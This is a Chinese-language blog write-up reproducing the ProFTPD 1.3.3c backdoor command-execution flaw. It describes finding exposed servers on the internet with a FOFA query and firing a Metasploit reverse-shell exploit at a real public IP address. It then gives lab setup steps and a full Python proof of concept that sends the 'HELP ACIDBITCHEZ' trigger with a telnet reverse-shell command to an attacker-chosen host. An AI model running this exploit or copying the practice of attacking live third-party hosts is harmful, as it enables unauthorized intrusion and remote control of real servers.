ProFTPD-1.3.3c Backdoor Command Execution漏洞复现+poc

https://www.whereisk0shl.top/post/proftpd-1.3.3chou-men-fen-xi

https://github.com/proftpd/proftpd
在官网和官方github上找了一圈1.3.3c版本的proftpd，应该是漏洞太多，官方把下了

https://blog.csdn.net/morrino/article/details/115836400 这个文章提供了一个部署1.3.3c版本的靶机

遂决定在fofa上找
app=“proftpd” && banner=“1.3.3c”
找到了一些，尝试使用msf利用下，试了一些个，都不存在漏洞

search ProFTPd-1.3.3c
use 0
show options
set rhosts 64.6.247.69
show payloads
set payload cmd/unix/reverse
show options
set lhost 192.168.18.137
exploit

https://www.exploit-db.com/exploits/15662 找到了存在后门的软件

安装 https://blog.csdn.net/feelinghappy/article/details/106817434

./configure --prefix=/usr/local/ftp && make && make install

#建立FTP组和FTP用户（用户名、用户组），设置密码
mkdir /opt/ftp_soft   #创建用户的家目录
groupadd ftpgroup   
useradd ftpadmin -g ftpgroup -d /opt/ftp_soft -s /sbin/nologin  #创建并指定家目录
passwd ftpadmin
chown ftpadmin:ftpgroup /opt/ftp_soft -R     #设置属主：数组，否则即时安装成功也没有权限


make && make install


#修改配置文件
vim /usr/local/ftp/etc/proftpd.conf
#修改
User    ftpadmin  
Group  ftpgroup
DefaultRoot  /opt/ftp_soft
#添加
PassivePorts 11100 11111  #被动模式端口段（数据传输）
DefaultAddress     192.168.18.137

#启动
/usr/local/ftp/sbin/proftpd

终于复现成功

#!/usr/bin/python
#coding:utf-8
#author:k0shl
import socket
import os

def exp_socket(RHOST,s):
    try:
        s.connect((RHOST,21))
        str = s.recv(1024)
        print str
        return str
    except Exception,e:
        print e
        return 0

def exploit(RHOST,s,cmd):
    try:
        s.send('HELP ACIDBITCHEZ\r\n')
        s.send(cmd)
        print "[+]Exploit send ok!"
    except Exception,e:
        print e
if __name__ == '__main__':
    try:
        print "攻击前请使用nc绑定端口，等待shell连接"
        LHOST = raw_input("input shell ip:")
        LPORT = raw_input("input shell port:")
        RHOST = raw_input("input target ip:")
        #LHOST = '172.16.39.141'
        #LPORT = '4444'
        #RHOST = '172.16.39.137'
        print '[+]start connect to %s'%RHOST
        s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
        socket_result = exp_socket(RHOST,s)
        if socket_result != 0:
            if '220' in socket_result:
                print '[+]Try to Exploit'
                cmd = "nohup /bin/bash -c '(sleep 4184|telnet "+ LHOST + " " + LPORT +"|while : ; do sh && break; done 2>&1|telnet "+LHOST + " "+LPORT+">/dev/null 2>&1 &)' >/dev/null 2>&1\n"
                exploit(RHOST,s,cmd)
                s.close()
            else:
                print '[-]no vul!'
                s.close()
        else:
            print '[-]connect to ip error!'
            s.close()
    except Exception,e:
        s.close()
        print e

还在想如何更好的直接验证漏洞的存在，而不是反弹shell